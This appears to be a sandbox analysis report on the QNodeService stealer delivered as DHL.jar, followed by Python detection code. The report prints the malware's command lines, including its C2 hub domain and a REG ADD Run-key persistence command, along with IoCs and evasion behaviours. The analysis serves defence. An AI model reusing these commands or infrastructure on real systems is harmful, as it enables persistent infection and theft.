Analysis
  Max time kernel:   146s
  Max time network:  128s
  Platform:          windows10_x64
  Resource:          win10
  Submitted:         12/10/2020, 06:16
Tasks
  Static task:      static1
  Behavioral task:  behavioral1   Sample: DHL.jar   Resource: win7v200722
  Behavioral task:  behavioral2   Sample: DHL.jar   Resource: win10
General
  Target:  DHL.jar
  Size:    318KB
  MD5:     ba3c3a491c1f542ba70b5cba78664c27
  SHA1:    e3f3836cbd6c20799d5fd847852732ec6bbb64a6
  SHA256:  f104ffa104dc5c0739ed98c605c0cc32fc148aa40dab5de2916d9b1f864a4654
  SHA512:  7d0201320644db94497f6e1d0584a2be985210c205ae63a3ba4aaa7831d778aa5893e608ed96c082e31f4e63173ff626043cf90af93a2a747710366fa6745b50
Malware Config
Signatures
QNodeService
  Trojan/stealer written in Node.js and delivered by a Java downloader.
Executes dropped EXE (3 IoCs)
  PID   Process
  3848  node.exe
  2172  node.exe
  968   node.exe

Adds Run key to start application (2 TTPs, 2 IoCs)
  Key created
    \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Process: reg.exe
  Set value (str)
    \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\4150b6ef-79e8-4958-a0e7-711c10eeb34d = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\""
    Process: reg.exe

JavaScript code in executable (3 IoCs)
  Resource                                      YARA rule
  behavioral2/files/0x000100000001ad91-167.dat  js
  behavioral2/files/0x000100000001ad91-172.dat  js
  behavioral2/files/0x000100000001ad91-176.dat  js

Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Flow  IoC
  18    wtfismyip.com
  19    wtfismyip.com

Checks processor information in registry (2 TTPs, 6 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Description        IoC                                                                          Process
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                      node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz                 node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  node.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1                      node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz                 node.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString  node.exe

Suspicious behavior: EnumeratesProcesses (18 IoCs)
  PID   Process   Events
  3848  node.exe  4
  2172  node.exe  4
  968   node.exe  10

Suspicious use of WriteProcessMemory (12 IoCs; each entry is recorded twice in the report)
  Description                      PID   Process    procid_target
  PID 3700 wrote to memory of 1744  3700  java.exe   74
  PID 1744 wrote to memory of 3848  1744  javaw.exe  78
  PID 3848 wrote to memory of 2172  3848  node.exe   80
  PID 2172 wrote to memory of 968   2172  node.exe   81
  PID 968 wrote to memory of 2972   968   node.exe   83
  PID 2972 wrote to memory of 1196  2972  cmd.exe    84
Processes
  [1] C:\ProgramData\Oracle\Java\javapath\java.exe  (PID 3700)
      Command line: java -jar C:\Users\Admin\AppData\Local\Temp\DHL.jar
      - Suspicious use of WriteProcessMemory

    [2] C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe  (PID 1744)
        Command line: "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\7c354b6e.tmp
        - Suspicious use of WriteProcessMemory

      [3] C:\Users\Admin\node-v14.12.0-win-x64\node.exe  (PID 3848)
          Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain jahbless.hopto.org --hub-domain localhost
          - Executes dropped EXE
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of WriteProcessMemory

        [4] C:\Users\Admin\node-v14.12.0-win-x64\node.exe  (PID 2172)
            Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_vwXpV9\boot.js --hub-domain jahbless.hopto.org --hub-domain localhost
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of WriteProcessMemory

          [5] C:\Users\Admin\node-v14.12.0-win-x64\node.exe  (PID 968)
              Command line: C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_vwXpV9\boot.js --hub-domain jahbless.hopto.org --hub-domain localhost
              - Executes dropped EXE
              - Checks processor information in registry
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of WriteProcessMemory

            [6] C:\Windows\system32\cmd.exe  (PID 2972)
                Command line: C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4150b6ef-79e8-4958-a0e7-711c10eeb34d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
                - Suspicious use of WriteProcessMemory

              [7] C:\Windows\system32\reg.exe  (PID 1196)
                  Command line: REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4150b6ef-79e8-4958-a0e7-711c10eeb34d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
                  - Adds Run key to start application
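The process tree above gives three behaviours worth turning into detection logic: a node.exe binary run from a user profile with java.exe/javaw.exe in its ancestry, a C2 hub passed on the command line via --hub-domain (the first node.exe stage is started with a bare "-" argument, which makes node read its script from stdin, so that stage never has a script path on disk to inspect), and a Run value that launches a .vbs under C:\Users. The following is an added example, not part of the Triage report or of the malware: the event records are constructed from the report's process tree and Run-key IoC, with a benign node.exe process (PID 4100) and a benign per-user Run value ("OneDrive") added as controls, and the dataclass shapes are a simplified stand-in for real EDR or Sysmon telemetry rather than any vendor's format.

```python
"""Detection logic for the QNodeService execution chain recorded in this report.

Added example: events are constructed from the report's process tree and
Run-key IoC; the record shapes are a simplified stand-in for EDR telemetry.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class RegEvent:
    pid: int
    image: str
    key: str
    value_name: str
    data: str


# Paths, arguments and value name exactly as they appear in the report.
NODE = r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe"
BOOT_JS = r"C:\Users\Admin\AppData\Local\Temp\_qhub_node_vwXpV9\boot.js"
HUB_ARGS = "--hub-domain jahbless.hopto.org --hub-domain localhost"
RUN_VALUE = "4150b6ef-79e8-4958-a0e7-711c10eeb34d"
RUN_KEY = (r"\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000"
           r"\Software\Microsoft\Windows\CurrentVersion\Run")

# Constructed records mirroring the report's process tree; PID 4100 is a benign control.
PROC_EVENTS = [
    ProcEvent(3700, 0, r"C:\ProgramData\Oracle\Java\javapath\java.exe",
              r"java -jar C:\Users\Admin\AppData\Local\Temp\DHL.jar"),
    ProcEvent(1744, 3700, r"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe",
              r'"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar '
              r"C:\Users\Admin\AppData\Local\Temp\7c354b6e.tmp"),
    ProcEvent(3848, 1744, NODE, f"{NODE} - {HUB_ARGS}"),          # script fed via stdin
    ProcEvent(2172, 3848, NODE, f"{NODE} {BOOT_JS} {HUB_ARGS}"),
    ProcEvent(968, 2172, NODE, f"{NODE} {BOOT_JS} {HUB_ARGS}"),
    ProcEvent(2972, 968, r"C:\Windows\system32\cmd.exe",
              r'C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows'
              r'\CurrentVersion\Run" /V "4150b6ef-79e8-4958-a0e7-711c10eeb34d" /t REG_SZ /F '
              r'/D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""'),
    ProcEvent(1196, 2972, r"C:\Windows\system32\reg.exe",
              r'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V '
              r'"4150b6ef-79e8-4958-a0e7-711c10eeb34d" /t REG_SZ /F /D '
              r'"cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""'),
    ProcEvent(4100, 4000, r"C:\Program Files\nodejs\node.exe",
              r'"C:\Program Files\nodejs\node.exe" server.js --port 8080'),
]

# Constructed registry records: the report's Run value plus a benign .exe autostart as control.
REG_EVENTS = [
    RegEvent(1196, r"C:\Windows\system32\reg.exe", RUN_KEY, RUN_VALUE,
             r'cmd /D /C "C:\Users\Admin\qhub\node\2.0.10\boot.vbs"'),
    RegEvent(5200, r"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe", RUN_KEY,
             "OneDrive", r'"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
]

JAVA_IMAGES = {"java.exe", "javaw.exe"}
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.I)
_EXT = r"(?:vbs|vbe|js|jse|wsf|wsh|hta|bat|cmd|ps1)"
# Quoted path (may contain spaces) or unquoted path ending in a script extension.
SCRIPT_RE = re.compile(rf'"([A-Za-z]:\\[^"]+?\.{_EXT})"|([A-Za-z]:\\\S+?\.{_EXT})\b', re.I)
USER_DIR_RE = re.compile(r"^[A-Za-z]:\\Users\\", re.I)
HUB_RE = re.compile(r"--hub-domain\s+(\S+)", re.I)
STDIN_RE = re.compile(r'node\.exe"?\s+-(?:\s|$)', re.I)   # "node.exe -" reads script from stdin


def _basename(image):
    return image.rsplit("\\", 1)[-1].lower()


def ancestors(events, pid):
    """Yield parent, grandparent, ... of pid while a record exists (loop-safe)."""
    by_pid = {e.pid: e for e in events}
    cur, seen = by_pid.get(pid), set()
    while cur is not None and cur.ppid in by_pid and cur.ppid not in seen:
        seen.add(cur.ppid)
        cur = by_pid[cur.ppid]
        yield cur


def node_spawned_by_java(events):
    """PIDs of node.exe with java.exe/javaw.exe anywhere in the ancestry (the DHL.jar -> node hop)."""
    return sorted(e.pid for e in events if _basename(e.image) == "node.exe"
                  and any(_basename(a.image) in JAVA_IMAGES for a in ancestors(events, e.pid)))


def hub_domains(events):
    """Hub (C2) domains passed to node.exe via --hub-domain."""
    return {d for e in events if _basename(e.image) == "node.exe" for d in HUB_RE.findall(e.cmdline)}


def node_script_from_stdin(events):
    """node.exe started with a bare '-' argument: the script was piped in, not dropped to disk."""
    return sorted(e.pid for e in events
                  if _basename(e.image) == "node.exe" and STDIN_RE.search(e.cmdline))


def suspicious_run_values(reg_events):
    """(value name, script path) for Run/RunOnce values that launch a script from a user profile."""
    hits = []
    for r in reg_events:
        m = SCRIPT_RE.search(r.data) if RUN_KEY_RE.search(r.key) else None
        if m and USER_DIR_RE.match(m.group(1) or m.group(2)):
            hits.append((r.value_name, m.group(1) or m.group(2)))
    return hits


if __name__ == "__main__":
    print("node.exe under Java:", node_spawned_by_java(PROC_EVENTS))
    print("hub domains:", sorted(hub_domains(PROC_EVENTS)))
    print("node.exe with stdin script:", node_script_from_stdin(PROC_EVENTS))
    print("suspicious Run values:", suspicious_run_values(REG_EVENTS))
```

Each check is deliberately narrow: the Run-key rule ignores the control entry because its data points at an .exe rather than a script interpreter target, and the ancestry rule ignores the control node.exe because no Java process sits above it. In a real environment the `--hub-domain` and stdin checks are the ones least likely to fire on developer tooling, so they make the better high-confidence alerts, while the Java-to-node ancestry check is better used for hunting.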